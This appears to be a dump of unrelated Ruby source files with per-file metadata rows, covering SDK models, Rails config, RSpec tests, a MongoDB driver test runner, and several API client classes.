      attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
      # Each property accepts either the camelCase API key or the snake_case
      # Ruby key, but never both at once.
      self.defined_tags = attributes[:'definedTags'] if attributes[:'definedTags']
      raise 'You cannot provide both :definedTags and :defined_tags' if attributes.key?(:'definedTags') && attributes.key?(:'defined_tags')
      self.defined_tags = attributes[:'defined_tags'] if attributes[:'defined_tags']
      self.display_name = attributes[:'displayName'] if attributes[:'displayName']
      raise 'You cannot provide both :displayName and :display_name' if attributes.key?(:'displayName') && attributes.key?(:'display_name')
      self.display_name = attributes[:'display_name'] if attributes[:'display_name']
      self.freeform_tags = attributes[:'freeformTags'] if attributes[:'freeformTags']
      raise 'You cannot provide both :freeformTags and :freeform_tags' if attributes.key?(:'freeformTags') && attributes.key?(:'freeform_tags')
      self.freeform_tags = attributes[:'freeform_tags'] if attributes[:'freeform_tags']
    end
    # rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
    # rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
    # rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
    # Checks equality by comparing each attribute.
    # @param [Object] other the other object to be compared
    def ==(other)
      return true if equal?(other)
      self.class == other.class &&
        defined_tags == other.defined_tags &&
        display_name == other.display_name &&
        freeform_tags == other.freeform_tags
    end
    # rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
    # @see the `==` method
    # @param [Object] other the other object to be compared
    def eql?(other)
      self == other
    end
    # rubocop:disable Metrics/AbcSize, Layout/EmptyLines
    # Calculates hash code according to all attributes.
    # @return [Fixnum] Hash code
    def hash
      [defined_tags, display_name, freeform_tags].hash
    end
    # rubocop:enable Metrics/AbcSize, Layout/EmptyLines
    # rubocop:disable Metrics/AbcSize, Layout/EmptyLines
    # Builds the object from hash
    # @param [Hash] attributes Model attributes in the form of hash
    # @return [Object] Returns the model itself
    def build_from_hash(attributes)
      return nil unless attributes.is_a?(Hash)
      self.class.swagger_types.each_pair do |key, type|
        if type =~ /^Array<(.*)>/i
          # check to ensure the input is an array given that the the attribute
          # is documented as an array but the input is not
          if attributes[self.class.attribute_map[key]].is_a?(Array)
            public_method("#{key}=").call(
              attributes[self.class.attribute_map[key]]
                .map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
            )
          end
        elsif !attributes[self.class.attribute_map[key]].nil?
          public_method("#{key}=").call(
            OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
          )
        end
        # or else data not found in attributes(hash), not an issue as the data can be optional
      end
      self
    end
    # rubocop:enable Metrics/AbcSize, Layout/EmptyLines
    # Returns the string representation of the object
    # @return [String] String presentation of the object
    def to_s
      to_hash.to_s
    end
    # Returns the object in the form of hash
    # @return [Hash] Returns the object in the form of hash
    def to_hash
      hash = {}
      self.class.attribute_map.each_pair do |attr, param|
        value = public_method(attr).call
        next if value.nil? && !instance_variable_defined?("@#{attr}")
        hash[param] = _to_hash(value)
      end
      hash
    end
    private
    # Outputs non-array value in the form of hash
    # For object, use to_hash. Otherwise, just return the value
    # @param [Object] value Any valid value
    # @return [Hash] Returns the value in the form of hash
    def _to_hash(value)
      if value.is_a?(Array)
        value.compact.map { |v| _to_hash(v) }
      elsif value.is_a?(Hash)
        {}.tap do |hash|
          value.each { |k, v| hash[k] = _to_hash(v) }
        end
      elsif value.respond_to? :to_hash
        value.to_hash
      else
        value
      end
    end
  end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 38.316327 | 245 | 0.679095 |
5d064f5df070f703128893be29ea7e39e14606eb | 503 | WillPaginate.per_page = 10
class Question < ActiveRecord::Base
# This is Sinatra! Remember to create a migration!
self.per_page = 10
UP_VOTE = 'Upvote'
belongs_to :user
has_many :answers, :dependent => :destroy
has_many :votes, :foreign_key => "question_id", :class_name => "QuestionVote", :dependent => :destroy
validates :title, :presence => true, :length => {:maximum => 200}
scope :top, -> { joins(:votes).where('vote_type = ?', UP_VOTE).group(:id).order(id: :desc).count }
end
| 23.952381 | 102 | 0.67992 |
21eba7919d3efa7f04a80a2e73b70129cba31260 | 1,771 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
config.serve_static_files = false
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.default_url_options = { :host => 'localhost' }
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
# config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Asset digests allow you to set far-future HTTP expiration dates on all assets,
# yet still be able to expire them through the digest params.
config.assets.digest = true
# Adds additional error checking when serving assets at runtime.
# Checks for improperly declared sprockets dependencies.
# Raises helpful error messages.
config.assets.raise_runtime_errors = true
Mongo::Logger.logger.level = ::Logger::FATAL
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
end
| 38.5 | 85 | 0.763411 |
392ddbdbc48156e56c1cc30dd5e2d8ca179b72f3 | 1,619 | module Cryptoexchange::Exchanges
module Btcsquare
module Services
class Market < Cryptoexchange::Services::Market
class << self
def supports_individual_ticker_query?
false
end
end
def fetch
output = super(ticker_url)
adapt_all(output)
end
def ticker_url
"#{Cryptoexchange::Exchanges::Btcsquare::Market::API_URL}/markets"
end
def adapt_all(output)
output.map do |pair|
target, base = pair.keys.first.split('-')
market_pair = Cryptoexchange::Models::MarketPair.new(
base: base,
target: target,
market: Btcsquare::Market::NAME
)
adapt(pair.values.first, market_pair)
end
end
def adapt(output, market_pair)
ticker = Cryptoexchange::Models::Ticker.new
ticker.base = market_pair.base
ticker.target = market_pair.target
ticker.market = Btcsquare::Market::NAME
ticker.ask = NumericHelper.to_d(output['ask'])
ticker.bid = NumericHelper.to_d(output['bid'])
ticker.high = NumericHelper.to_d(output['high'])
ticker.low = NumericHelper.to_d(output['low'])
ticker.last = NumericHelper.to_d(output['price'])
ticker.volume = NumericHelper.divide(NumericHelper.to_d(output['volume']), ticker.last)
ticker.timestamp = nil
ticker.payload = output
ticker
end
end
end
end
end
| 31.745098 | 100 | 0.560222 |
e241ef01b5d514b44dd5de6c21c2457633d1c685 | 2,464 | # frozen_string_literal: true
require 'spec_helper'
# Specs for GameToolsService's wrappers around the gametools.network HTTP API.
# Faraday is stubbed throughout, so no network access occurs.
RSpec.describe GameToolsService, type: :http do
  subject { described_class.new }
  describe '#get_server' do
    let(:server_name) { 'Battlefield da Depressao - LOCKER 24/7 50Hz - i3D.net' }
    let(:endpoint) { 'https://api.gametools.network/bf4/servers/' }
    let(:params) { { 'name' => server_name } }
    context 'with success' do
      it 'should return success monad response' do
        servers = build(:game_tools_servers)
        expect(Faraday)
          .to receive(:get)
          .with(endpoint, params)
          .and_return(Faraday::Response.new(status: 200, body: servers.to_json))
        result = subject.get_server('bf4', server_name)
        expect(result).to be_success
      end
    end
    context 'with failure' do
      it 'should return the message error' do
        # Shape mirrors the API's 422 validation-error payload.
        error = {
          'detail' => [
            {
              'loc' => %w(query name),
              'msg' => 'field required',
              'type' => 'value_error.missing'
            }
          ]
        }
        expect(Faraday)
          .to receive(:get)
          .with(endpoint, params)
          .and_return(Faraday::Response.new(status: 422, body: error.to_json))
        result = subject.get_server('bf4', server_name)
        expect(result).to be_failure
      end
    end
  end
  describe '#get_server_details' do
    let(:server_name) { 'Battlefield da Depressao - LOCKER 24/7 50Hz - i3D.net' }
    let(:endpoint) { 'https://api.gametools.network/bf4/detailedserver/' }
    let(:params) { { 'name' => server_name } }
    context 'with success' do
      it 'should return success monad response' do
        server_details = build(:game_tools_server_details)
        expect(Faraday)
          .to receive(:get)
          .with(endpoint, params)
          .and_return(Faraday::Response.new(status: 200, body: server_details.to_json))
        result = subject.get_server_details('bf4', server_name)
        expect(result).to be_success
      end
    end
    context 'with failure' do
      it 'should return the message error' do
        error = { 'errors' => ['error getting server info'] }
        expect(Faraday)
          .to receive(:get)
          .with(endpoint, params)
          .and_return(Faraday::Response.new(status: 422, body: error.to_json))
        result = subject.get_server_details('bf4', server_name)
        expect(result).to be_failure
      end
    end
  end
end
| 28 | 87 | 0.601055 |
f76cc0ed3e135b57240e3d1b026bb9e62ad521af | 1,696 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# NOTE: auto-generated by AutoRest (see header); manual edits are lost on
# regeneration.
module Azure::Network::Mgmt::V2019_08_01
  module Models
    #
    # List of virtual network gateway vpn client connection health.
    #
    class VpnClientConnectionHealthDetailListResult
      include MsRestAzure
      # @return [Array<VpnClientConnectionHealthDetail>] List of vpn client
      # connection health.
      attr_accessor :value
      #
      # Mapper for VpnClientConnectionHealthDetailListResult class as Ruby
      # Hash.
      # This will be used for serialization/deserialization.
      # (Consumed by the MsRest serialization machinery.)
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'VpnClientConnectionHealthDetailListResult',
          type: {
            name: 'Composite',
            class_name: 'VpnClientConnectionHealthDetailListResult',
            model_properties: {
              value: {
                client_side_validation: true,
                required: false,
                serialized_name: 'value',
                type: {
                  name: 'Sequence',
                  element: {
                    client_side_validation: true,
                    required: false,
                    serialized_name: 'VpnClientConnectionHealthDetailElementType',
                    type: {
                      name: 'Composite',
                      class_name: 'VpnClientConnectionHealthDetail'
                    }
                  }
                }
              }
            }
          }
        }
      end
    end
  end
end
| 29.241379 | 84 | 0.549528 |
1a3164379e6520b24de396d8e96004f42dacbed1 | 152 | class CreateProjects < ActiveRecord::Migration
def change
create_table :projects do |t|
t.string :name
t.timestamps
end
end
end
| 16.888889 | 46 | 0.677632 |
039a0c6383ef29100176f30c9ddfb18bad4950c2 | 1,055 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require 'spec_helper'
describe Elasticsearch::DSL::Search::Aggregations::ReverseNested do
  let(:search) do
    described_class.new
  end
  describe '#to_hash' do
    it 'can be converted to a hash' do
      # A bare reverse_nested aggregation serialises to an empty options hash.
      expect(search.to_hash).to eq(reverse_nested: {})
    end
  end
end
| 31.969697 | 67 | 0.754502 |
7a99bb2d0dcc6e59c66165ec4128f74de77d9afc | 7,449 | # frozen_string_literal: true
# encoding: utf-8
module Unified
  # CRUD operation implementations for the unified spec test runner. Each
  # method receives an operation description +op+ (a UsingHash-like object),
  # resolves the target entity and arguments, and performs the corresponding
  # driver call, returning its result.
  module CrudOperations
    def find(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        opts = {
          let: args.use('let'),
        }
        if session = args.use('session')
          opts[:session] = entities.get(:session, session)
        end
        req = collection.find(args.use!('filter'), **opts)
        if batch_size = args.use('batchSize')
          req = req.batch_size(batch_size)
        end
        if sort = args.use('sort')
          req = req.sort(sort)
        end
        if limit = args.use('limit')
          req = req.limit(limit)
        end
        req.to_a
      end
    end
    def count_documents(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        opts = {}
        if session = args.use('session')
          opts[:session] = entities.get(:session, session)
        end
        collection.find(args.use!('filter')).count_documents(**opts)
      end
    end
    def estimated_document_count(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        opts = {}
        if max_time_ms = args.use('maxTimeMS')
          opts[:max_time_ms] = max_time_ms
        end
        collection.estimated_document_count(**opts)
      end
    end
    def distinct(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        opts = {}
        if session = args.use('session')
          opts[:session] = entities.get(:session, session)
        end
        collection.find(args.use!('filter'), **opts).distinct(args.use!('fieldName'), **opts).to_a
      end
    end
    def find_one_and_update(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        filter = args.use!('filter')
        update = args.use!('update')
        opts = {
          let: args.use('let'),
        }
        # Spec gives 'Before'/'After'; driver wants :before/:after.
        if return_document = args.use('returnDocument')
          opts[:return_document] = return_document.downcase.to_sym
        end
        if session = args.use('session')
          opts[:session] = entities.get(:session, session)
        end
        collection.find_one_and_update(filter, update, **opts)
      end
    end
    def find_one_and_replace(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        filter = args.use!('filter')
        update = args.use!('replacement')
        opts = {
          let: args.use('let'),
        }
        if session = args.use('session')
          opts[:session] = entities.get(:session, session)
        end
        collection.find_one_and_replace(filter, update, **opts)
      end
    end
    def find_one_and_delete(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        filter = args.use!('filter')
        opts = {
          let: args.use('let'),
        }
        if session = args.use('session')
          opts[:session] = entities.get(:session, session)
        end
        collection.find_one_and_delete(filter, **opts)
      end
    end
    def insert_one(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        opts = {}
        if session = args.use('session')
          opts[:session] = entities.get(:session, session)
        end
        collection.insert_one(args.use!('document'), **opts)
      end
    end
    def insert_many(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        opts = {}
        # Nil-check (not truthiness) so an explicit ordered: false is passed.
        unless (ordered = args.use('ordered')).nil?
          opts[:ordered] = ordered
        end
        if session = args.use('session')
          opts[:session] = entities.get(:session, session)
        end
        collection.insert_many(args.use!('documents'), **opts)
      end
    end
    def update_one(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        opts = {
          let: args.use('let'),
        }
        if session = args.use('session')
          opts[:session] = entities.get(:session, session)
        end
        collection.update_one(args.use!('filter'), args.use!('update'), **opts)
      end
    end
    def update_many(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        opts = {
          let: args.use('let'),
        }
        # Consistency fix: honor a session argument like update_one does.
        if session = args.use('session')
          opts[:session] = entities.get(:session, session)
        end
        collection.update_many(args.use!('filter'), args.use!('update'), **opts)
      end
    end
    def replace_one(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        opts = {
          upsert: args.use('upsert'),
        }
        # Consistency fix: honor a session argument like the other operations.
        if session = args.use('session')
          opts[:session] = entities.get(:session, session)
        end
        collection.replace_one(
          args.use!('filter'),
          args.use!('replacement'),
          **opts
        )
      end
    end
    def delete_one(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        opts = {
          let: args.use('let'),
        }
        if session = args.use('session')
          opts[:session] = entities.get(:session, session)
        end
        collection.delete_one(args.use!('filter'), **opts)
      end
    end
    def delete_many(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        opts = {
          let: args.use('let'),
        }
        # Consistency fix: honor a session argument like delete_one does.
        if session = args.use('session')
          opts[:session] = entities.get(:session, session)
        end
        collection.delete_many(args.use!('filter'), **opts)
      end
    end
    def bulk_write(op)
      collection = entities.get(:collection, op.use!('object'))
      use_arguments(op) do |args|
        requests = args.use!('requests').map do |req|
          convert_bulk_write_spec(req)
        end
        opts = {}
        # BUG FIX: the previous truthiness check silently dropped an explicit
        # ordered: false and hard-coded true; nil-check and pass the value
        # through, matching insert_many.
        unless (ordered = args.use('ordered')).nil?
          opts[:ordered] = ordered
        end
        collection.bulk_write(requests, **opts)
      end
    end
    def aggregate(op)
      obj = entities.get_any(op.use!('object'))
      args = op.use!('arguments')
      pipeline = args.use!('pipeline')
      opts = {
        let: args.use('let'),
      }
      if session = args.use('session')
        opts[:session] = entities.get(:session, session)
      end
      unless args.empty?
        raise NotImplementedError, "Unhandled spec keys: #{args} in #{test_spec}"
      end
      obj.aggregate(pipeline, **opts).to_a
    end
    private
    # Translates one spec-format bulk write request ({'insertOne' => {...}})
    # into the driver's bulk_write model ({insert_one: ...}).
    def convert_bulk_write_spec(spec)
      unless spec.keys.length == 1
        raise NotImplementedError, "Must have exactly one item"
      end
      op, spec = spec.first
      spec = UsingHash[spec]
      out = case op
      when 'insertOne'
        spec.use!('document')
      when 'updateOne', 'updateMany'
        {
          filter: spec.use('filter'),
          update: spec.use('update'),
          upsert: spec.use('upsert'),
        }
      when 'replaceOne'
        {
          filter: spec.use('filter'),
          replacement: spec.use('replacement'),
          upsert: spec.use('upsert'),
        }
      when 'deleteOne', 'deleteMany'
        {
          filter: spec.use('filter'),
        }
      else
        raise NotImplementedError, "Unknown operation #{op}"
      end
      unless spec.empty?
        raise NotImplementedError, "Unhandled keys: #{spec}"
      end
      { Utils.underscore(op) => out }
    end
  end
end
| 28.54023 | 99 | 0.558464 |
381f8d3717b28d0de4648f73f4a7df262c26fa41 | 1,298 | # Encoding: utf-8
#
# This is auto-generated code, changes will be overwritten.
#
# Copyright:: Copyright 2013, Google Inc. All Rights Reserved.
# License:: Licensed under the Apache License, Version 2.0.
#
# Code generated by AdsCommon library 0.9.6 on 2014-08-12 14:23:05.
require 'ads_common/savon_service'
require 'dfp_api/v201405/proposal_service_registry'
module DfpApi; module V201405; module ProposalService
class ProposalService < AdsCommon::SavonService
def initialize(config, endpoint)
namespace = 'https://www.google.com/apis/ads/publisher/v201405'
super(config, endpoint, namespace, :v201405)
end
def create_proposals(*args, &block)
return execute_action('create_proposals', args, &block)
end
def get_proposals_by_statement(*args, &block)
return execute_action('get_proposals_by_statement', args, &block)
end
def perform_proposal_action(*args, &block)
return execute_action('perform_proposal_action', args, &block)
end
def update_proposals(*args, &block)
return execute_action('update_proposals', args, &block)
end
private
def get_service_registry()
return ProposalServiceRegistry
end
def get_module()
return DfpApi::V201405::ProposalService
end
end
end; end; end
| 27.617021 | 71 | 0.724961 |
ed7d04bf4a801559e8012f17709dc9f4b7a8d523 | 8,884 | =begin
#BillForward REST API
#No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=end
require 'date'
module BillForward
  # Paged result set of DunningLine records together with paging metadata
  # (page cursors, counts, execution time).
  # NOTE: generated by swagger-codegen for the BillForward REST API;
  # prefer regenerating over hand-editing.
  class DunningLinePagedMetadata
    # {\"description\":\"Paging parameter. URL fragment that can be used to fetch next page of results.\",\"verbs\":[\"GET\",\"PUT\",\"POST\"]}
    attr_accessor :next_page

    # {\"description\":\"Paging parameter. 0-indexed. Describes which page (given a page size of `recordsRequested`) of the result set you are viewing.\",\"verbs\":[\"GET\",\"PUT\",\"POST\"]}
    attr_accessor :current_page

    # {\"description\":\"Paging parameter. 0-indexed. Describes your current location within a pageable list of query results.\",\"verbs\":[\"GET\",\"PUT\",\"POST\"]}
    attr_accessor :current_offset

    # {\"default\":10,\"description\":\"Paging parameter. Describes how many records you requested.\",\"verbs\":[\"GET\",\"PUT\",\"POST\"]}
    attr_accessor :records_requested

    # {\"description\":\"Describes how many records were returned by your query.\",\"verbs\":[\"GET\",\"PUT\",\"POST\"]}
    attr_accessor :records_returned

    # {\"description\":\"Number of milliseconds taken by API to calculate response.\",\"verbs\":[\"GET\",\"PUT\",\"POST\"]}
    attr_accessor :execution_time

    # {\"description\":\"The results returned by your query.\",\"verbs\":[\"GET\",\"PUT\",\"POST\"]}
    attr_accessor :results

    # Attribute mapping from ruby-style variable name to JSON key.
    def self.attribute_map
      {
        :'next_page' => :'nextPage',
        :'current_page' => :'currentPage',
        :'current_offset' => :'currentOffset',
        :'records_requested' => :'recordsRequested',
        :'records_returned' => :'recordsReturned',
        :'execution_time' => :'executionTime',
        :'results' => :'results'
      }
    end

    # Attribute type mapping (used by build_from_hash/_deserialize).
    def self.swagger_types
      {
        :'next_page' => :'String',
        :'current_page' => :'Integer',
        :'current_offset' => :'Integer',
        :'records_requested' => :'Integer',
        :'records_returned' => :'Integer',
        :'execution_time' => :'Integer',
        :'results' => :'Array<DunningLine>'
      }
    end

    # Initializes the object
    # @param [Hash] attributes Model attributes in the form of hash
    #   (JSON-style camelCase keys, as strings or symbols)
    def initialize(attributes = {})
      return unless attributes.is_a?(Hash)

      # convert string to symbol for hash key
      attributes = attributes.each_with_object({}){|(k,v), h| h[k.to_sym] = v}

      if attributes.has_key?(:'nextPage')
        self.next_page = attributes[:'nextPage']
      end

      if attributes.has_key?(:'currentPage')
        self.current_page = attributes[:'currentPage']
      end

      if attributes.has_key?(:'currentOffset')
        self.current_offset = attributes[:'currentOffset']
      end

      if attributes.has_key?(:'recordsRequested')
        self.records_requested = attributes[:'recordsRequested']
      end

      if attributes.has_key?(:'recordsReturned')
        self.records_returned = attributes[:'recordsReturned']
      end

      if attributes.has_key?(:'executionTime')
        self.execution_time = attributes[:'executionTime']
      end

      if attributes.has_key?(:'results')
        # only accept an Array; a scalar here is silently ignored
        if (value = attributes[:'results']).is_a?(Array)
          self.results = value
        end
      end
    end

    # Show invalid properties with the reasons. Usually used together with valid?
    # @return Array for valid properties with the reasons
    def list_invalid_properties
      invalid_properties = Array.new
      return invalid_properties
    end

    # Check to see if the all the properties in the model are valid
    # @return true if the model is valid (all fields present/non-nil)
    def valid?
      return false if @next_page.nil?
      return false if @current_page.nil?
      return false if @current_offset.nil?
      return false if @records_requested.nil?
      return false if @records_returned.nil?
      return false if @execution_time.nil?
      return false if @results.nil?
      return true
    end

    # Checks equality by comparing each attribute.
    # @param [Object] Object to be compared
    def ==(o)
      return true if self.equal?(o)
      self.class == o.class &&
        next_page == o.next_page &&
        current_page == o.current_page &&
        current_offset == o.current_offset &&
        records_requested == o.records_requested &&
        records_returned == o.records_returned &&
        execution_time == o.execution_time &&
        results == o.results
    end

    # @see the `==` method
    # @param [Object] Object to be compared
    def eql?(o)
      self == o
    end

    # Calculates hash code according to all attributes.
    # @return [Fixnum] Hash code
    def hash
      [next_page, current_page, current_offset, records_requested, records_returned, execution_time, results].hash
    end

    # Builds the object from hash
    # @param [Hash] attributes Model attributes in the form of hash
    # @return [Object] Returns the model itself
    def build_from_hash(attributes)
      return nil unless attributes.is_a?(Hash)
      self.class.swagger_types.each_pair do |key, type|
        if type =~ /^Array<(.*)>/i
          # check to ensure the input is an array given that the attribute
          # is documented as an array but the input is not
          if attributes[self.class.attribute_map[key]].is_a?(Array)
            self.send("#{key}=", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )
          end
        elsif !attributes[self.class.attribute_map[key]].nil?
          self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
        end # or else data not found in attributes(hash), not an issue as the data can be optional
      end

      self
    end

    # Deserializes the data based on type
    # @param string type Data type
    # @param string value Value to be deserialized
    # @return [Object] Deserialized data
    def _deserialize(type, value)
      case type.to_sym
      when :DateTime
        DateTime.parse(value)
      when :Date
        Date.parse(value)
      when :String
        value.to_s
      when :Integer
        value.to_i
      when :Float
        value.to_f
      when :BOOLEAN
        if value.to_s =~ /^(true|t|yes|y|1)$/i
          true
        else
          false
        end
      when :Object
        # generic object (usually a Hash), return directly
        value
      when /\AArray<(?<inner_type>.+)>\z/
        inner_type = Regexp.last_match[:inner_type]
        value.map { |v| _deserialize(inner_type, v) }
      when /\AHash<(?<k_type>.+), (?<v_type>.+)>\z/
        k_type = Regexp.last_match[:k_type]
        v_type = Regexp.last_match[:v_type]
        {}.tap do |hash|
          value.each do |k, v|
            hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
          end
        end
      else # model — resolve the type name inside the BillForward namespace
        temp_model = BillForward.const_get(type).new
        temp_model.build_from_hash(value)
      end
    end

    # Returns the string representation of the object
    # @return [String] String presentation of the object
    def to_s
      to_hash.to_s
    end

    # to_body is an alias to to_hash (backward compatibility)
    # @return [Hash] Returns the object in the form of hash
    def to_body
      to_hash
    end

    # Returns the object in the form of hash
    # @return [Hash] Returns the object in the form of hash (camelCase keys, nils omitted)
    def to_hash
      hash = {}
      self.class.attribute_map.each_pair do |attr, param|
        value = self.send(attr)
        next if value.nil?
        hash[param] = _to_hash(value)
      end
      hash
    end

    # Outputs non-array value in the form of hash
    # For object, use to_hash. Otherwise, just return the value
    # @param [Object] value Any valid value
    # @return [Hash] Returns the value in the form of hash
    def _to_hash(value)
      if value.is_a?(Array)
        value.compact.map{ |v| _to_hash(v) }
      elsif value.is_a?(Hash)
        {}.tap do |hash|
          value.each { |k, v| hash[k] = _to_hash(v) }
        end
      elsif value.respond_to? :to_hash
        value.to_hash
      else
        value
      end
    end
  end
end
| 32.903704 | 191 | 0.633949 |
627241dfd5c3332b3cb856dc3d4e417f80bf7ec9 | 627 | class PublishingApiRedirectWorker < PublishingApiWorker
def perform(content_id, destination, locale, allow_draft = false)
Services.publishing_api.unpublish(
content_id,
type: "redirect",
locale: locale,
alternative_path: destination.strip,
allow_draft: allow_draft,
discard_drafts: !allow_draft,
)
rescue GdsApi::HTTPNotFound
# nothing to do here as we can't unpublish something that doesn't exist
nil
rescue GdsApi::HTTPUnprocessableEntity => e
# retrying is unlikely to fix the problem, we can send the error straight to Sentry
GovukError.notify(e)
end
end
| 33 | 87 | 0.727273 |
bfe5e7553d67c211766af79a31f40a8a6ef3094a | 859 | require_relative "spec_helper"
describe "current_datetime_timestamp extension" do
  before do
    @ds = Sequel.mock[:table].extension(:current_datetime_timestamp)
  end

  after do
    # Restore the default so the Sequel.datetime_class mutations below do not
    # leak into other specs.
    Sequel.datetime_class = Time
  end

  it "should have current_timestamp respect Sequel.datetime_class" do
    t = Sequel::Dataset.new(nil).current_datetime
    t.must_be_kind_of(Time)
    # The generated timestamp should be "now" (within 100ms).
    (Time.now - t < 0.1).must_equal true

    Sequel.datetime_class = DateTime
    t = Sequel::Dataset.new(nil).current_datetime
    t.must_be_kind_of(DateTime)
    # 0.1 seconds expressed in days, since DateTime subtraction yields days.
    (DateTime.now - t < (0.1/86400)).must_equal true
  end

  it "should have current_timestamp value be literalized as CURRENT_TIMESTAMP" do
    @ds.literal(@ds.current_datetime).must_equal 'CURRENT_TIMESTAMP'
    Sequel.datetime_class = DateTime
    @ds.literal(@ds.current_datetime).must_equal 'CURRENT_TIMESTAMP'
  end
end
| 30.678571 | 81 | 0.746217 |
91738a59a6bc4f5e44778b5ed24e670e7cd9a743 | 2,658 | ##
## Copyright (c) 2015 SONATA-NFV [, ANY ADDITIONAL AFFILIATION]
## ALL RIGHTS RESERVED.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
## Neither the name of the SONATA-NFV [, ANY ADDITIONAL AFFILIATION]
## nor the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## This work has been performed in the framework of the SONATA project,
## funded by the European Commission under Grant number 671517 through
## the Horizon 2020 and 5G-PPP programmes. The authors would like to
## acknowledge the contributions of their colleagues of the SONATA
## partner consortium (www.sonata-nfv.eu).
# encoding: utf-8
require 'tempfile'
require 'pp'
class NService
  attr_accessor :descriptor

  # Thin wrapper around a network-service catalogue. Optionally persists
  # descriptors as YAML files under <folder>/service_descriptors.
  #
  # catalogue - object exposing #url, #create, #find and #find_by_uuid
  # logger    - Logger-like object (only #debug is used here)
  # folder    - base directory for descriptor files, or nil to skip file I/O
  def initialize(catalogue, logger, folder)
    @catalogue = catalogue
    @url = @catalogue.url + '/network-services'
    @logger = logger
    @descriptor = {}
    if folder
      @folder = File.join(folder, "service_descriptors")
      # mkdir_p also creates missing parents (plain mkdir raised when `folder`
      # itself did not exist). File.exists? was removed in Ruby 3.2, so use the
      # supported File.exist?.
      FileUtils.mkdir_p @folder unless File.exist? @folder
    end
  end

  # Writes `content` (a Hash) to <folder>/service_descriptors/<basename>,
  # where <basename> is the last path segment of content['name'].
  def to_file(content)
    @logger.debug "NService.to_file(#{content})"
    filename = content['name'].split('/')[-1]
    File.open(File.join(@folder, filename), 'w') { |f| YAML.dump(content, f) }
  end

  # Loads a YAML descriptor from `filename`, memoizes it in @descriptor and
  # returns it.
  def from_file(filename)
    # Fixed broken interpolation: the original logged the literal text
    # "#(unknown)" instead of the file name.
    @logger.debug "NService.from_file(#{filename})"
    @descriptor = YAML.load_file filename
    @logger.debug "NService.from_file: content = #{@descriptor}"
    @descriptor
  end

  # Stores @descriptor in the catalogue unless a record with the same
  # vendor/name/version already exists; returns the catalogue record(s).
  def store
    @logger.debug "NService.store(#{@descriptor})"
    service = duplicated_service?(@descriptor)
    service = @catalogue.create(@descriptor) unless service.any?
    @logger.debug "NService.store service #{service}"
    service
  end

